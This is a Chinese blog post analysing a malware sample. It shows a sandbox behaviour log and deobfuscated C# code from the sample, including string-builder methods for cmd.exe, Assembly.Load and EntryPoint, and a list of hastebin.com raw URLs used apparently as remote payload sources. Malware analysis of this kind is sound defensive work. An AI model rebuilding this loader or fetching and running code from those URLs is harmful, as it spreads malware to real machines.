09:07:44:659,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:44:659,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:44:659,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:44:705,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll,	offset:0x00000000 datalen:0x00001000 ,	0x00000000 [操作成功完成。  ],	
09:07:44:705,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:44:705,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:44:705,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:44:721,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	offset:0x00000000 datalen:0x00001000 ,	0x00000000 [操作成功完成。  ],	
09:07:44:861,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	PROC_exec,	C:\Windows\SysWOW64\WerFault.exe,	target_pid:8492 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' ,	0x00000000 [操作成功完成。  ],	
09:07:44:861,	WerFault.exe,	8492:0,	4092,	EXEC_create,	C:\Windows\SysWOW64\WerFault.exe,	parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' image_base:0x0000000000A90000 image_size:0x0006F000 ,	0x00000000 [操作成功完成。  ],	
09:07:44:940,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:44:940,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:44:940,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,	,	0x00000000 [操作成功完成。  ],	
09:07:44:940,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:44:940,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:44:940,	WerFault.exe,	8492:8588,	4092,	FILE_truncate,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:45:112,	WerFault.exe,	8492:8588,	4092,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	offset:0x00000000 datalen:0x00000020 ,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:0,	4092,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,	,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:45:144,	WerFault.exe,	8492:8588,	4092,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:0,	4092,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll,	base:0x0000000070060000 size:0x0020F000 ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:0,	4092,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,	,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:158,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,	,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,	offset:0x00000000 datalen:0x00001306 ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:45:174,	WerFault.exe,	8492:0,	4092,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,	,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:6220,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:6220,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:6220,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:6220,	4092,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:8024,	4092,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:8024,	4092,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds,	type:0x0000000B datalen:8 data:'61 96 EE 64 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:45:221,	WerFault.exe,	8492:8024,	4092,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount,	type:0x0000000B datalen:8 data:'0C 8F 01 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:45:237,	WerFault.exe,	8492:6220,	4092,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:07:45:361,	WerFault.exe,	8492:8024,	4092,	NET_connect,	52.168.117.173:443,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,	,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,	,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,	,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv,	,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt,	,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue,	filter:'*_*_*_*_*' ,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0,	access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 ,	0x00000000 [操作成功完成。  ],	
09:07:46:393,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:46:408,	WerFault.exe,	8492:8588,	4092,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,	access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:07:46:408,	WerFault.exe,	8492:8588,	4092,	FILE_chmod,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,	attrib:0x00002080 ,	0x00000000 [操作成功完成。  ],	
09:07:46:408,	WerFault.exe,	8492:8588,	4092,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:46:408,	WerFault.exe,	8492:8588,	4092,	FILE_read,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:07:46:408,	WerFault.exe,	8492:0,	4092,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,	,	0x00000000 [操作成功完成。  ],	
09:07:46:424,	WerFault.exe,	8492:0,	4092,	EXEC_destroy,	C:\Windows\SysWOW64\WerFault.exe,	parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' ,	0x00000000 [操作成功完成。  ],	
09:07:46:424,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_destroy,	C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' ,	0x00000000 [操作成功完成。  ],	

  

关键行为:

1、09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ],
2、09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ],

3、创建和删除了好些临时文件:

4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ],

 

看下其代码(已经反混淆):

		// Token: 0x06000005 RID: 5 RVA: 0x00002052 File Offset: 0x00000252
		public static string smethod_2()
		{
			return string.Format("{0}{1}{2}{3}", new object[]
			{
				"1",
				"7",
				"6",
				"9"
			});
		}

		// Token: 0x06000006 RID: 6 RVA: 0x000025F4 File Offset: 0x000007F4
		public static string smethod_3()
		{
			return string.Format("{0}{1}{2}{3}{4}{5}{6}", new object[]
			{
				"c",
				"m",
				"d",
				".",
				"e",
				"x",
				"e"
			});
		}

		// Token: 0x06000007 RID: 7 RVA: 0x0000264C File Offset: 0x0000084C
		public static string smethod_4()
		{
			return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}", new object[]
			{
				"A",
				"s",
				"s",
				"e",
				"m",
				"b",
				"l",
				"y"
			});
		}

		// Token: 0x06000008 RID: 8 RVA: 0x00002084 File Offset: 0x00000284
		public static string smethod_5()
		{
			return string.Format("{0}{1}{2}{3}", new object[]
			{
				"L",
				"o",
				"a",
				"d"
			});
		}

		// Token: 0x06000009 RID: 9 RVA: 0x000026AC File Offset: 0x000008AC
		public static string smethod_6()
		{
			return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}", new object[]
			{
				"E",
				"n",
				"t",
				"r",
				"y",
				"P",
				"o",
				"i",
				"n",
				"t"
			});
		}

		// Token: 0x0600000A RID: 10 RVA: 0x0000271C File Offset: 0x0000091C
		public static string smethod_7()
		{
			return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}", new object[]
			{
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"y",
				"o",
				"n",
				"o",
				"z",
				"i",
				"l",
				"a",
				"c",
				"e",
				"@",
				"@",
				"@",
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"u",
				"r",
				"a",
				"l",
				"a",
				"p",
				"u",
				"v",
				"u",
				"h",
				"@",
				"@",
				"@",
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"e",
				"p",
				"u",
				"k",
				"u",
				"b",
				"a",
				"q",
				"u",
				"b",
				"@",
				"@",
				"@",
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"o",
				"s",
				"a",
				"j",
				"o",
				"r",
				"o",
				"z",
				"i",
				"w",
				"@",
				"@",
				"@",
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"e",
				"q",
				"e",
				"d",
				"o",
				"c",
				"e",
				"f",
				"e",
				"x",
				"@",
				"@",
				"@",
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"a",
				"j",
				"i",
				"f",
				"u",
				"y",
				"i",
				"j",
				"e",
				"z",
				"@",
				"@",
				"@",
				"h",
				"t",
				"t",
				"p",
				"s",
				":",
				"/",
				"/",
				"h",
				"a",
				"s",
				"t",
				"e",
				"b",
				"i",
				"n",
				".",
				"c",
				"o",
				"m",
				"/",
				"r",
				"a",
				"w",
				"/",
				"e",
				"s",
				"u",
				"r",
				"i",
				"j",
				"a",
				"k",
				"a",
				"d"
			});
		}

		// Token: 0x0600000B RID: 11 RVA: 0x000020B6 File Offset: 0x000002B6
		public static string smethod_8()
		{
			return string.Format("{0}{1}{2}", new object[]
			{
				"@",
				"@",
				"@"
			});
		}

  

  • smethod_2: 返回字符串 "1769"
  • smethod_3: 返回字符串 "cmd.exe"
  • smethod_4: 返回字符串 "Assembly"
  • smethod_5: 返回字符串 "Load"
  • smethod_6: 返回字符串 "EntryPoint"
  • smethod_7: 返回一个非常长的字符串,包含多次重复的 "http://haste...xyz", "http://haste...uhabqub" 和 "http://haste...ikad"
  • smethod_8: 返回一个字符串 "@@@"
posted @ 2023-08-30 09:24  bonelee  阅读(34)  评论(1编辑  收藏  举报